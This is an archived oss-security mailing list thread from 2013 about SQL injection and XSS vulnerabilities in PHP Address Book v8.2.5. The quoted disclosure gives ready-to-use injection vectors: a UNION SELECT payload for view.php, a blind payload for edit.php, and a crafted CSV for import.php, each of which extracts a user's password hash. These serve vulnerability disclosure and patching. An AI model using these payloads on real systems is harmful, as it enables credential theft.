Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Date: Wed, 17 Apr 2013 17:27:45 +0300
From: Henri Salo <henri@...v.fi>
To: Doraemon Sk8ers <doraemon.sk8ers@...il.com>
Cc: oss-security@...ts.openwall.com
Subject: Re: Multiple vulnerabilities in PHP Address Book
 v8.2.5

Hello,

I believe CVE-2013-1748 #1 is duplicate of CVE-2008-2565 as per OSVDB[1]. As far
as I know most of security vulnerabilities reported to this project haven't been
fixed. Haven't verified this detail. What php-addressbook project would need is
patches to fix all issues you can find. Finding vulnerabilities is easy -
fixing in upstream is not. I can help you if you are willing to write patches.
Takes hour or two :)

1: http://osvdb.org/45965

---
Henri Salo

On Wed, Apr 17, 2013 at 11:14:27AM +0800, Doraemon Sk8ers wrote:
> There is a SQL injection vulnerability and reflected XSS in Simple PHP
> Address Book v8.2.5.
> The 2 vulnerabilities had been assigned the CVE identifier CVE-2013-1748
> (SQLi) & CVE-2013-1749 (XSS) respectively.
> 
> # Software Link: http://sourceforge.net/projects/php-addressbook/
> # Version: v8.2.5
> # Tested on: v8.2.5
> # CVE : CVE-2013-1748 (SQLi) & CVE-2013-1749 (XSS)
> 
> 
> Details:
> -----------
> *
> *
> *CVE-2013-1748 (SQLi)*
> 
> We have discovered 3 pages which are prone to SQL Injection
> 
> 1.	/view.php?id=1
> The "id" parameter is vulnerable to SQL injection
> Injection Vector:
> 	/view.php?id=-1' union select '1','2','3','4',(select username from
> users limit 1),(select md5_pass from users limit 1),(select email from
> users limit 1),'8','9','10','11','12','13','14','15','16','17','18','19','20','21','22','23','24','25','26','27','28','29','30','31','32','33','34','35','36','37','38','39','40','41
> This injection vector will dump the username, md5 password and email
> of the first user in the user table onto the page itself
> 
> 2.	/edit.php
> Most of the fields on this page are vulnerable to SQL injection
> Injection Vector (inclusive of quotes):
> 	'+(select ASCII(SUBSTRING((SELECT md5_pass from users limit 1), 1)))+'
> This will dump out the ASCII value of the 1st character of the md5
> password of the first user
> 
> 3.	/import.php
> The same injection vulnerability as Point 2 above is also present in
> the import function
> Using the same injection vector, saved in a csv file
> 	'+(select ASCII(SUBSTRING((SELECT md5_pass from users limit 1), 1)))+'
> Similarly, this injection vector will dump out the ASCII value of the
> 1st character of the md5 password of the first user
> 
> The original input csv sample looks like this
> "Last name";"First
> name";"Birthday";"Address";"ZIP";"City";"Home";"Mobile";"E-mail
> home";"Work";"Fax";"E-mail office";"Second address";"Second phone"
> "thelastname";"thefirstname";"13.09.1951";"Street";"1234";"city,
> Country";"+1 123 456 789";"+2 345 678 910";"first.last@...l1.com";"+3
> 456 789 101";"+4 567 897 011";"first.last@...l2.net";"second street,
> 1234 secondcity, secondcountry";"+5 678 910 111"
> 
> The injected csv with the injected vectors looks like this
> "Last name";"First
> name";"Birthday";"Address";"ZIP";"City";"Home";"Mobile";"E-mail
> home";"Work";"Fax";"E-mail office";"Second address";"Second phone"
> "";"injectedthrucsv";"13.09.1951";"'+(select ASCII(SUBSTRING((SELECT
> md5_pass from users limit 1), 1)))+'";"";"city, Country";"+1 123 456
> 789";"+2 345 678 910";"first.last@...l1.com";"+3 456 789 101";"+4 567
> 897 011";"first.last@...l2.net";"second street, 1234 secondcity,
> secondcountry";"+5 678 910 111"
<snip>

Download attachment "signature.asc" of type "application/pgp-signature" (199 bytes)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.